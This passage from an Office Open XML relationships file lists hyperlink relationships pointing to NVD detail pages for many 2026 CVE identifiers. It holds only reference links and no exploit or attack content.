Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76967" TargetMode="External" Id="rId2272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77489" TargetMode="External" Id="rId2273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77500" TargetMode="External" Id="rId2274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77503" TargetMode="External" Id="rId2275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77904" TargetMode="External" Id="rId2276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78136" TargetMode="External" Id="rId2277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78447" TargetMode="External" Id="rId2278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78448" TargetMode="External" Id="rId2279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78482" TargetMode="External" Id="rId2280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78484" TargetMode="External" Id="rId2281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78493" TargetMode="External" Id="rId2282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79907" TargetMode="External" Id="rId2283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79908" TargetMode="External" Id="rId2284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79909" TargetMode="External" Id="rId2285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80075" TargetMode="External" Id="rId2286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80161" TargetMode="External" Id="rId2287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80166" TargetMode="External" Id="rId2288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81353" TargetMode="External" Id="rId2289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81386" TargetMode="External" Id="rId2290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81388" TargetMode="External" Id="rId2291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81396" TargetMode="External" Id="rId2292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81397" TargetMode="External" Id="rId2293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81398" TargetMode="External" Id="rId2294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81947" TargetMode="External" Id="rId2295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81948" TargetMode="External" Id="rId2296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81949" TargetMode="External" Id="rId2297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81950" TargetMode="External" Id="rId2298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81951" TargetMode="External" Id="rId2299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81953" TargetMode="External" Id="rId2300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81954" TargetMode="External" Id="rId2301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81956" TargetMode="External" Id="rId2302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81957" TargetMode="External" Id="rId2303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81959" TargetMode="External" Id="rId2304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81960" TargetMode="External" Id="rId2305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81973" TargetMode="External" Id="rId2306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81975" TargetMode="External" Id="rId2307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81976" TargetMode="External" Id="rId2308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81979" TargetMode="External" Id="rId2309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81980" TargetMode="External" Id="rId2310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81981" TargetMode="External" Id="rId2311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81983" TargetMode="External" Id="rId2312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81985" TargetMode="External" Id="rId2313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81986" TargetMode="External" Id="rId2314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81987" TargetMode="External" Id="rId2315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81988" TargetMode="External" Id="rId2316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81989" TargetMode="External" Id="rId2317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81990" TargetMode="External" Id="rId2318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81992" TargetMode="External" Id="rId2319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82005" TargetMode="External" Id="rId2320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82006" TargetMode="External" Id="rId2321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82007" TargetMode="External" Id="rId2322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83498" TargetMode="External" Id="rId2323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83942" TargetMode="External" Id="rId2324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83952" TargetMode="External" Id="rId2325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83954" TargetMode="External" Id="rId2326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83955" TargetMode="External" Id="rId2327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83959" TargetMode="External" Id="rId2328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83967" TargetMode="External" Id="rId2329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83968" TargetMode="External" Id="rId2330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83969" TargetMode="External" Id="rId2331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83970" TargetMode="External" Id="rId2332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83971" TargetMode="External" Id="rId2333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83972" TargetMode="External" Id="rId2334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83973" TargetMode="External" Id="rId2335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83974" TargetMode="External" Id="rId2336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83975" TargetMode="External" Id="rId2337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83976" TargetMode="External" Id="rId2338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83977" TargetMode="External" Id="rId2339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83978" TargetMode="External" Id="rId2340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83979" TargetMode="External" Id="rId2341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83980" TargetMode="External" Id="rId2342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83981" TargetMode="External" Id="rId2343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83982" TargetMode="External" Id="rId2344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83983" TargetMode="External" Id="rId2345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83985" TargetMode="External" Id="rId2346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83986" TargetMode="External" Id="rId2347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83987" TargetMode="External" Id="rId2348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83988" TargetMode="External" Id="rId2349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83990" TargetMode="External" Id="rId2350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83995" TargetMode="External" Id="rId2351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84000" TargetMode="External" Id="rId2352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84042" TargetMode="External" Id="rId2353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85983" TargetMode="External" Id="rId2354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86313" TargetMode="External" Id="rId2355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86504" TargetMode="External" Id="rId2356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88052" TargetMode="External" Id="rId2357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9034" TargetMode="External" Id="rId2358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15140" TargetMode="External" Id="rId2359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15913" TargetMode="External" Id="rId2360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17176" TargetMode="External" Id="rId2361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17527" TargetMode="External" Id="rId2362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18167" TargetMode="External" Id="rId2363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18905" TargetMode="External" Id="rId2364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19118" TargetMode="External" Id="rId2365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19283" TargetMode="External" Id="rId2366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19304" TargetMode="External" Id="rId2367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19306" TargetMode="External" Id="rId2368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19397" TargetMode="External" Id="rId2369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19584" TargetMode="External" Id="rId2370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23920" TargetMode="External" Id="rId2371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28802" TargetMode="External" Id="rId2372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34948" TargetMode="External" Id="rId2373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44252" TargetMode="External" Id="rId2374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44293" TargetMode="External" Id="rId2375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44495" TargetMode="External" Id="rId2376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4598" TargetMode="External" Id="rId2377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4602" TargetMode="External" Id="rId2378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48553" TargetMode="External" Id="rId2379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48554" TargetMode="External" Id="rId2380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53549" TargetMode="External" Id="rId2381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53553" TargetMode="External" Id="rId2382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54493" TargetMode="External" Id="rId2383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55523" TargetMode="External" Id="rId2384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55658" TargetMode="External" Id="rId2385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57171" TargetMode="External" Id="rId2386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61617" TargetMode="External" Id="rId2387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61792" TargetMode="External" Id="rId2388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63464" TargetMode="External" Id="rId2389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63633" TargetMode="External" Id="rId2390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66738" TargetMode="External" Id="rId2391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66767" TargetMode="External" Id="rId2392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68560" TargetMode="External" Id="rId2393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69192" TargetMode="External" Id="rId2394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69683" TargetMode="External" Id="rId2395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70479" TargetMode="External" Id="rId2396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71303" TargetMode="External" Id="rId2397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71307" TargetMode="External" Id="rId2398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72762" TargetMode="External" Id="rId2399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72777" TargetMode="External" Id="rId2400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73217" TargetMode="External" Id="rId2401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73218" TargetMode="External" Id="rId2402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73267" TargetMode="External" Id="rId2403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73315" TargetMode="External" Id="rId2404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73626" TargetMode="External" Id="rId2405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75033" TargetMode="External" Id="rId2406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75569" TargetMode="External" Id="rId2407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76640" TargetMode="External" Id="rId2408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76851" TargetMode="External" Id="rId2409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77106" TargetMode="External" Id="rId2410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77646" TargetMode="External" Id="rId2411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77775" TargetMode="External" Id="rId2412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77909" TargetMode="External" Id="rId2413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78623" TargetMode="External" Id="rId2414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79637" TargetMode="External" Id="rId2415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79750" TargetMode="External" Id="rId2416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80134" TargetMode="External" Id="rId2417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81210" TargetMode="External" Id="rId2418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81832" TargetMode="External" Id="rId2419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82536" TargetMode="External" Id="rId2420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82537" TargetMode="External" Id="rId2421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84256" TargetMode="External" Id="rId2422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84361" TargetMode="External" Id="rId2423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85168" TargetMode="External" Id="rId2424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85182" TargetMode="External" Id="rId2425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85619" TargetMode="External" Id="rId2426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86083" TargetMode="External" Id="rId2427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86207" TargetMode="External" Id="rId2428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86494" TargetMode="External" Id="rId2429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86498" TargetMode="External" Id="rId2430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87084" TargetMode="External" Id="rId2431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87993" TargetMode="External" Id="rId2432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87996" TargetMode="External" Id="rId2433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89060" TargetMode="External" Id="rId2434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9040" TargetMode="External" Id="rId2435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9804" 